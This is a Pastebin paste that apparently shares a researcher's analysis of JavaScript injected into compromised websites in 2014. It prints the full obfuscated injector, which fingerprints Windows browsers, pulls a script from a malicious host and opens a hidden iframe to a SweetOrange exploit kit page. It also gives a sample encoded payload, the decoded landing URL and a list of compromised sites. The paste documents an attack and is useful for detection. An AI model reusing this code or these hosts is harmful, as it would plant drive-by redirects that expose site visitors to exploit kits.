Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // The following JS code has been seen injected into other Java Scripts on compromised websites
- /* PjN4bD7k7tLFnVmgT7Cz */
- var qzQtTI = "useridA0817FB25";
- var PdfwG = "28";
- var NbUcmN = 1;
- function ytLAm7(ExRd6H) {
- var otvobS;
- var viRKc8J = document.cookie;
- if (!viRKc8J) {
- return null;
- }
- viRKc8J = viRKc8J.replace(/\s/g, "");
- var Q7CHJu = viRKc8J.split(";");
- for (var i = 0; i < Q7CHJu.length; i++) {
- var HpojhA = Q7CHJu[i].split("=");
- if (HpojhA[0] == ExRd6H) {
- otvobS = unescape(HpojhA[1]);
- break;
- }
- }
- return otvobS;
- };
- function sLS1uOJ(ExRd6H, UTlda6n, kPBDO) {
- var exp = new Date();
- var IuhFf = exp.getTime() + (kPBDO * 60 * 60 * 1000);
- exp.setTime(IuhFf);
- var p2rahA2 = ExRd6H + "=" + escape(UTlda6n) + "; expires=" + exp.toGMTString() + "; domain=" + document.domain;
- document.cookie = p2rahA2;
- };
- function oQybCm() {
- sLS1uOJ(qzQtTI, PdfwG, 48);
- };
- function ws7old() {
- try {
- CcdzJE = "KkKFOooO0cd2";
- if (jquery_datepicker.length == 0) {
- sLS1uOJ(qzQtTI, PdfwG, 48);
- return;
- }
- try {
- if (document.getElementById(CcdzJE)) {
- document.getElementById(CcdzJE).parentNode.removeChild(document.getElementById(CcdzJE));
- }
- } catch (e) {};
- var AF4G2 = unescape(jquery_datepicker.replace(/[g-zG-Z]+/g, "").replace(/[=\-!@$;.,]+/g, "%"));
- var O2gGJP5 = document.createElement("DIV");
- O2gGJP5.id = CcdzJE;
- O2gGJP5.style.cssText = "position:absolute;left:0px;top:200px;opacity:0;filter:alpha(opacity=0);";
- O2gGJP5.innerHTML = "<iframe onload='oQybCm();' src='" + AF4G2 + "' width=19 height=19 frameborder=0 scrolling='no'></iframe>";
- document.body.appendChild(O2gGJP5);
- } catch (e) {
- setTimeout("ws7old()", 300);
- }
- };
- function OEhGaU() {
- var uNHdM9f, iUGRl = "KHncdu2de343";
- try {
- if (document.getElementById(iUGRl)) {
- document.getElementById(iUGRl).parentNode.removeChild(document.getElementById(iUGRl));
- }
- uNHdM9f = document.createElement("SCRIPT");
- uNHdM9f.type = "text/javascript";
- uNHdM9f.id = iUGRl;
- if (uNHdM9f.readyState) {
- uNHdM9f.onreadystatechange = function () {
- if (this.readyState == "loaded" || this.readyState == "complete") {
- uNHdM9f.onreadystatechange = null;
- ws7old();
- }
- };
- } else {
- uNHdM9f.onload = function () {
- ws7old();
- };
- }
- uNHdM9f.src = "http://cdn2.movetoclarksville.com/k?t=" + Math.floor(Math.random() * 4294967295);
- if (document.getElementsByTagName("head").length > 0) {
- document.getElementsByTagName("head")[0].appendChild(uNHdM9f);
- } else {
- document.getElementsByTagName("body")[0].appendChild(uNHdM9f);
- }
- } catch (e) {
- setTimeout("OEhGaU()", 300);
- }
- };
- function iuw38Bx() {
- var hIEo3 = navigator.userAgent;
- var huOUD7n = 0;
- if (hIEo3.indexOf("Windows") == -1 || (hIEo3.indexOf("MSIE") == -1 && hIEo3.indexOf("Gecko/") == -1 && hIEo3.indexOf("Trident") == -1)) {
- return 0;
- }
- try {
- if (NbUcmN) {
- try {
- if (ytLAm7(qzQtTI) == PdfwG) {
- return false;
- }
- } catch (e) {};
- }
- if (hIEo3.indexOf("MSIE") != -1 || hIEo3.indexOf("Trident") != -1) {
- try {
- huOUD7n = AdLlLVU();
- function AdLlLVU() {
- return 0;
- }
- } catch (e) {
- huOUD7n = 1;
- }
- }
- } catch (e) {};
- if (huOUD7n == 0) {
- OEhGaU();
- }
- };
- iuw38Bx(); /* 5BbjUoP6mAAMqzPV */
- // If the required conditions are met, the script will redirect the browser to 'cdn2.movetoclarksville.com'. Example:
- //
- // cdn2.movetoclarksville.com/k?t=3273935373
- // the number at the end is random
- // the response will be a variable declaration that is later used by the main JS. Example of the response:
- var jquery_datepicker='I;X68=g74.7k4-7V0K=3aL=2fj-k2fJ@63i@64q-J6eJ-2ey!6w1$h6l8=O6X1g.g6rd@61L!O7Z4j,w6o5!72!O6w9h.O6N1=6HcG=7T3,2Hel-6ufO@j72H@u67-3a!3Q1$36=3n1Q;32U$Y3N2-2f.7L0!W7h2!T6fR@6Q4;7I5l.m63,7K4@W7o3=M2f-W77H!6i5.6u2;7O3$6N9S-7O4v.R65J@z7g3y.2f$7j3!P65=K63@Z2Rfr=7M3@m7Z4h!V6y1!x7I2$i67!M6I1.P6cQ$r6v1;O78@7p9-2ie,k70i.6N8-7y0w;Q3fk.6e.s6v5I@t6N2o@J7S5I-6xc!6r1.3dm=3t3';
- // once processed will result in a URL leading to SweetOrange EK landing page. Example:
- http://cdn.ahamaterials.org:16122/products/websites/sec/stargalaxy.php?nebula=3
- // some of the examples of URLs seen performing redirects to 'cdn2.movetoclarksville.com'. Redirects started appearing on my radar at the beginning of June 2014.
- http://dontmakemenuts.com/2013/07/ulta-beauty-living-proof-frizz-free-friday-complimentary-blowout/
- http://dukeupdate.com/
- http://interiordesignable.com/layout-for-your-next-the-actual-and-new-guest-bathroom/
- http://interiordesignable.com/simple-decoration-kids-room-ideas-best/
- http://interiordesignable.com/zen-bathroom-decor-for-the-home/
- http://jcpa.org/Jcpa/VHeadlines.asp?width=200&height=70&bacgroundColor=FFFFFF&textColor=000000&delay=4000
- http://joyfulhomemaking.com/2012/04/quinoa-chicken-sweet-potato-stew.html
- http://smokeybones.com/
- http://smokeybones.com/locations/
- http://www.aquariumdrunkard.com/2014/06/30/gilbert-osullivan-alone-again-naturally/
- http://www.conestogalogcabins.com/
- http://www.consultingcase101.com/mckinsey-assesses-management-consulting-industry/
- http://www.fitness19.com/what-length-of-workout-is-best/
- http://www.genesistoday.com/
- http://www.graciebarra.com/2013/05/look-and-feel-like-a-champ-by-knowing-how-to-tie-your-belt/
- http://www.graciebarra.com/georgia
- http://www.grrlpowercomic.com/archives/1053
- http://www.handicappedpets.com/walkin-wheels-rear-harness
- http://www.newmansown.com/
- http://www.newmansown.com/foodQA.aspx
- http://www.oakinv.com/
- http://www.oakvc.com/
- http://www.oakvc.com/investments-portfolio-overview
- http://www.techjournal.org/2013/04/geo-targeting-nabs-one-in-five-smartphone-users/
- http://www.whichwich.com/
- http://www.whichwich.com/content/durham-north-carolina-you-get-new-which-wich-today
- http://www.whichwich.com/locations
- http://www.whichwich.com/menu
- http://www.whichwich.com/online_ordering/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
